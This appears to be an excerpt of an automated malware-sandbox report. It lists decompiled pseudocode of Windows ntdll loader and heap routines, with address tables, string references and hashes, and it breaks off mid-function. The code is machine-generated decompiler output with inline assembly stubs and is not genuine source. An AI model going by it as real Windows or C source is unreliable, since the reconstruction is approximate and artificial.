										_t143 = E01678A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1755c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1755c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E016AF380(_t136, 0x1641184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01682280(_t108, 0x17586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01739D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0167FFB0(_t118, _t156, 0x17586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E016A9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                    0x01678799
                    0x0167879d
                    0x016787a1
                    0x016787a3
                    0x016787a8
                    0x016787c3
                    0x016787c3
                    0x016787c8
                    0x016787d1
                    0x016787d4
                    0x016787d8
                    0x016787e5
                    0x016787ec
                    0x016c9bfe
                    0x016c9c00
                    0x016c9c02
                    0x016c9c08
                    0x016c9c0d
                    0x016c9c0f
                    0x016c9c14
                    0x016c9c2d
                    0x016c9c32
                    0x016c9c37
                    0x016c9c3a
                    0x016c9c3c
                    0x016c9c42
                    0x016c9c42
                    0x016c9c3c
                    0x016c9c02
                    0x016787da
                    0x016787df
                    0x016787e3
                    0x00000000
                    0x00000000
                    0x016787e3
                    0x016787f2
                    0x00000000
                    0x016787fb
                    0x016787fd
                    0x016787fe
                    0x0167880e
                    0x0167880f
                    0x01678810
                    0x01678814
                    0x0167881a
                    0x0167881c
                    0x0167881f
                    0x01678821
                    0x01678822
                    0x01678824
                    0x01678826
                    0x0167882c
                    0x0167882e
                    0x016c9c48
                    0x016c9c48
                    0x01678834
                    0x01678834
                    0x01678837
                    0x00000000
                    0x00000000
                    0x01678837
                    0x0167882e
                    0x0167883d
                    0x01678840
                    0x01678843
                    0x01678846
                    0x01678849
                    0x0167884c
                    0x0167884e
                    0x01678850
                    0x01678852
                    0x01678854
                    0x01678857
                    0x016788b4
                    0x016788b6
                    0x016788b6
                    0x01678859
                    0x01678859
                    0x01678859
                    0x01678861
                    0x01678866
                    0x0167886a
                    0x0167893d
                    0x01678941
                    0x00000000
                    0x01678947
                    0x01678947
                    0x0167894a
                    0x0167894c
                    0x00000000
                    0x01678952
                    0x01678955
                    0x0167895a
                    0x0167895d
                    0x0167895d
                    0x0167895f
                    0x01678961
                    0x01678961
                    0x01678968
                    0x00000000
                    0x00000000
                    0x0167896a
                    0x0167896b
                    0x0167896e
                    0x00000000
                    0x01678970
                    0x01678970
                    0x01678970
                    0x01678970
                    0x01678972
                    0x01678972
                    0x01678974
                    0x00000000
                    0x0167897a
                    0x0167897a
                    0x0167897d
                    0x00000000
                    0x01678983
                    0x016c9c65
                    0x016c9c6d
                    0x016c9c72
                    0x016c9c75
                    0x016c9c75
                    0x016c9c82
                    0x016c9c86
                    0x016c9c87
                    0x016c9c88
                    0x016c9c89
                    0x016c9c8c
                    0x016c9c90
                    0x016c9c95
                    0x016c9c97
                    0x016c9ca0
                    0x016c9ca3
                    0x016c9ca9
                    0x016c9ca9
                    0x00000000
                    0x016c9ca9
                    0x016c9ca3
                    0x00000000
                    0x016c9c97
                    0x0167897d
                    0x00000000
                    0x01678974
                    0x01678988
                    0x01678992
                    0x01678996
                    0x00000000
                    0x01678996
                    0x0167894c
                    0x00000000
                    0x01678870
                    0x0167887b
                    0x0167887d
                    0x0167887f
                    0x01678881
                    0x01678884
                    0x01678884
                    0x01678886
                    0x01678889
                    0x0167888c
                    0x0167888e
                    0x01678891
                    0x01678891
                    0x01678898
                    0x00000000
                    0x00000000
                    0x0167889a
                    0x0167889b
                    0x0167889e
                    0x00000000
                    0x00000000
                    0x016788a0
                    0x016788a8
                    0x016788b0
                    0x016788b2
                    0x016788d3
                    0x016788d5
                    0x00000000
                    0x016788d7
                    0x016788db
                    0x016788dc
                    0x016788e0
                    0x016788e8
                    0x016788ee
                    0x016788f0
                    0x016788f3
                    0x016788fc
                    0x01678901
                    0x01678906
                    0x0167890c
                    0x0167890c
                    0x0167890f
                    0x01678916
                    0x01678917
                    0x01678918
                    0x01678919
                    0x0167891a
                    0x0167891f
                    0x01678921
                    0x016c9c52
                    0x016c9c55
                    0x016c9c5b
                    0x016c9cac
                    0x016c9cc0
                    0x016c9cc0
                    0x016c9c55
                    0x01678927
                    0x01678927
                    0x0167892f
                    0x01678933
                    0x00000000
                    0x016788f5
                    0x016788f5
                    0x00000000
                    0x016788f7
                    0x016788f7
                    0x016788fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016788fa
                    0x016788f5
                    0x016788f3
                    0x00000000
                    0x016788d5
                    0x00000000
                    0x016788b2
                    0x016788c9
                    0x00000000
                    0x016788c9
                    0x0167887f
                    0x0167886a
                    0x01678857
                    0x01678852
                    0x016788bf
                    0x016788bf
                    0x016787aa
                    0x016787ad
                    0x016787ae
                    0x016787b4
                    0x016787b5
                    0x016787b6
                    0x016787b8
                    0x016787bd
                    0x016787c1
                    0x016787f4
                    0x016787fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016787c1
                    0x00000000

                    Strings
                    • minkernel\ntdll\ldrsnap.c, xrefs: 016C9C28
                    • LdrpDoPostSnapWork, xrefs: 016C9C1E
                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 016C9C18
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                    • API String ID: 2994545307-1948996284
                    • Opcode ID: 19a51cc26da47f2c89968df794b31072c2b95c2393cb1a9cb22856fd87bb73cf
                    • Instruction ID: 26bd8fd22108c0c70722835e9a65a1fafb1dd9431b7f136a905f3dd37a5e840a
                    • Opcode Fuzzy Hash: 19a51cc26da47f2c89968df794b31072c2b95c2393cb1a9cb22856fd87bb73cf
                    • Instruction Fuzzy Hash: 5491E071A00216DFEB18DF5DDC89ABABBBAFF44314B1541ADD906AB241E770ED01CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E0169AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E016BD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1758a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E016A96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01713C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E016A96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0166B150();
							} else {
								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0166B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E017214FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01687D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01721411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01687D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01721411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                    0x0169ac85
                    0x0169ac88
                    0x0169ac8a
                    0x0169ac8d
                    0x0169ac91
                    0x0169ac99
                    0x0169ac9c
                    0x016d9f57
                    0x016d9f5b
                    0x016d9f60
                    0x016d9f60
                    0x0169aca8
                    0x0169acae
                    0x0169acda
                    0x0169acde
                    0x0169ace8
                    0x0169aceb
                    0x0169acee
                    0x00000000
                    0x0169acee
                    0x0169acf6
                    0x0169acb0
                    0x0169acb0
                    0x0169acbb
                    0x0169acbd
                    0x0169acc0
                    0x0169acc5
                    0x0169adae
                    0x0169adb4
                    0x0169adb4
                    0x0169acd4
                    0x0169acd8
                    0x0169acf9
                    0x0169acff
                    0x0169ad04
                    0x0169ad08
                    0x0169ad09
                    0x0169ad10
                    0x0169ad12
                    0x0169ad18
                    0x016d9f6f
                    0x016d9f74
                    0x016d9f76
                    0x016d9f7c
                    0x016d9f84
                    0x016d9f88
                    0x016d9f89
                    0x016d9f90
                    0x016d9f90
                    0x016d9f76
                    0x0169ad1e
                    0x0169ad24
                    0x0169ad26
                    0x016da097
                    0x016da09b
                    0x016da0ba
                    0x016da0bf
                    0x016da09d
                    0x016da0b2
                    0x016da0b7
                    0x016da0c5
                    0x016da0c8
                    0x016da0cb
                    0x016da0d2
                    0x00000000
                    0x0169ad2c
                    0x0169ad2c
                    0x0169ad2f
                    0x0169ad34
                    0x0169ad36
                    0x016d9f97
                    0x016d9f9a
                    0x00000000
                    0x00000000
                    0x016d9fa9
                    0x0169ad3e
                    0x0169ad3e
                    0x0169ad41
                    0x016d9fb3
                    0x016d9fb9
                    0x016d9fc0
                    0x016d9fd0
                    0x016d9fd0
                    0x016d9fc0
                    0x0169ad4a
                    0x0169ad50
                    0x0169ad5c
                    0x0169ad62
                    0x0169ad68
                    0x0169ad6b
                    0x0169ad6d
                    0x016d9fda
                    0x016d9fdd
                    0x00000000
                    0x00000000
                    0x016d9fec
                    0x00000000
                    0x0169ad73
                    0x0169ad73
                    0x0169ad73
                    0x0169ad75
                    0x0169ad75
                    0x0169ad78
                    0x016d9ff6
                    0x016d9ffc
                    0x016da003
                    0x016da00e
                    0x016da010
                    0x016da01b
                    0x016da01b
                    0x016da01b
                    0x016da038
                    0x016da038
                    0x016da003
                    0x0169ad84
                    0x0169ad89
                    0x0169ad8c
                    0x0169ad8e
                    0x016da042
                    0x016da045
                    0x00000000
                    0x00000000
                    0x016da054
                    0x00000000
                    0x0169ad94
                    0x0169ad94
                    0x0169ad94
                    0x0169ad96
                    0x0169ad96
                    0x0169ad99
                    0x016da063
                    0x016da065
                    0x016da070
                    0x016da070
                    0x016da070
                    0x016da08d
                    0x016da08d
                    0x0169ada4
                    0x0169ada6
                    0x00000000
                    0x0169ada6
                    0x0169ad8e
                    0x0169ad6d
                    0x0169ad3c
                    0x0169ad3c
                    0x00000000
                    0x0169ad3c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0169acd8

                    Strings
                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 016DA0CD
                    • HEAP: , xrefs: 016DA0BA
                    • HEAP[%wZ]: , xrefs: 016DA0AD
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                    • API String ID: 0-1340214556
                    • Opcode ID: 79da619c7d861587eb3a897cfd14b0bf5ba7175337d0474eafca36ee3441f2e7
                    • Instruction ID: f091a79bc5bf6ff75591f9251151ad87087338010a8fec6cbbf7828254eba33d
                    • Opcode Fuzzy Hash: 79da619c7d861587eb3a897cfd14b0bf5ba7175337d0474eafca36ee3441f2e7
                    • Instruction Fuzzy Hash: C1810572604684EFEB26CBACCD84BA9BBF8FF05318F1441A5E5518B392D774E944CB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E0168B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0172A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1758748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0166B150();
					__eflags =  *0x1757bc8;
					if(__eflags == 0) {
						E01722073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0172A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1758720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1758720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0168B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0172A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0168E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                    0x0168b746
                    0x0168b74b
                    0x0168b74d
                    0x0168b750
                    0x0168b755
                    0x0168b758
                    0x0168b758
                    0x0168b75e
                    0x0168b763
                    0x0168b764
                    0x0168b76a
                    0x0168b76d
                    0x0168b771
                    0x0168b776
                    0x0168b85c
                    0x0168b85d
                    0x0168b860
                    0x0168b865
                    0x016d2ba1
                    0x016d2ba2
                    0x016d2ba9
                    0x016d2bae
                    0x016d2bae
                    0x0168b77c
                    0x0168b77c
                    0x0168b77c
                    0x0168b785
                    0x0168b788
                    0x016d2bb6
                    0x016d2bb9
                    0x00000000
                    0x00000000
                    0x016d2bbf
                    0x016d2bc5
                    0x016d2bc9
                    0x016d2be8
                    0x016d2bed
                    0x016d2bcb
                    0x016d2be0
                    0x016d2be5
                    0x016d2bf3
                    0x016d2bf8
                    0x016d2bfd
                    0x016d2c05
                    0x016d2c0e
                    0x016d2c0e
                    0x00000000
                    0x0168b78e
                    0x0168b78e
                    0x0168b78e
                    0x0168b791
                    0x0168b791
                    0x0168b797
                    0x0168b797
                    0x0168b79f
                    0x0168b7a9
                    0x0168b7af
                    0x0168b7af
                    0x0168b7b1
                    0x0168b7b6
                    0x0168b7e2
                    0x0168b7e2
                    0x0168b7e7
                    0x0168b880
                    0x0168b7ed
                    0x0168b7ed
                    0x0168b7ed
                    0x0168b7ef
                    0x0168b7f2
                    0x0168b7f2
                    0x0168b7f5
                    0x0168b7fa
                    0x016d2c2d
                    0x016d2c2e
                    0x016d2c39
                    0x0168b800
                    0x0168b800
                    0x0168b802
                    0x0168b805
                    0x0168b808
                    0x0168b808
                    0x0168b80a
                    0x0168b80d
                    0x0168b816
                    0x0168b81c
                    0x0168b822
                    0x0168b82f
                    0x0168b88b
                    0x0168b892
                    0x0168b897
                    0x0168b899
                    0x0168b89b
                    0x0168b89e
                    0x0168b8a5
                    0x0168b8a8
                    0x0168b8aa
                    0x0168b8ac
                    0x0168b8ac
                    0x0168b8aa
                    0x0168b892
                    0x0168b831
                    0x0168b839
                    0x0168b83b
                    0x0168b83b
                    0x0168b844
                    0x0168b84b
                    0x0168b852
                    0x0168b7b8
                    0x0168b7ba
                    0x0168b7bf
                    0x0168b7c4
                    0x016d2c18
                    0x016d2c19
                    0x016d2c23
                    0x0168b7ca
                    0x0168b7ca
                    0x0168b7cc
                    0x0168b7cf
                    0x0168b7d1
                    0x0168b7d1
                    0x0168b7d4
                    0x0168b7dc
                    0x0168b8bb
                    0x0168b8bb
                    0x0168b8be
                    0x0168b8be
                    0x0168b8c1
                    0x00000000
                    0x00000000
                    0x0168b8c3
                    0x0168b8c5
                    0x0168b8c7
                    0x0168b8e0
                    0x00000000
                    0x0168b8e0
                    0x0168b8cc
                    0x0168b8cc
                    0x00000000
                    0x0168b8cc
                    0x0168b8d6
                    0x0168b8d6
                    0x00000000
                    0x0168b7dc
                    0x0168b7b6

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-1334570610
                    • Opcode ID: 0a4b9f9aa615b29b3fcfaa2b67858753a496fda6426074a846efc747f464fb67
                    • Instruction ID: b59c8ec5c9bb2c161d2d840d932ca89a1875b2ca7ada5345cdd27465f3c8bf3c
                    • Opcode Fuzzy Hash: 0a4b9f9aa615b29b3fcfaa2b67858753a496fda6426074a846efc747f464fb67
                    • Instruction Fuzzy Hash: EF61D370610301DFDB29EF28C844B6ABBE5FF04314F19866DE8498B356D770E882CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01677E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E01677E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0167CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0166C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1755780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E016E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1755780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
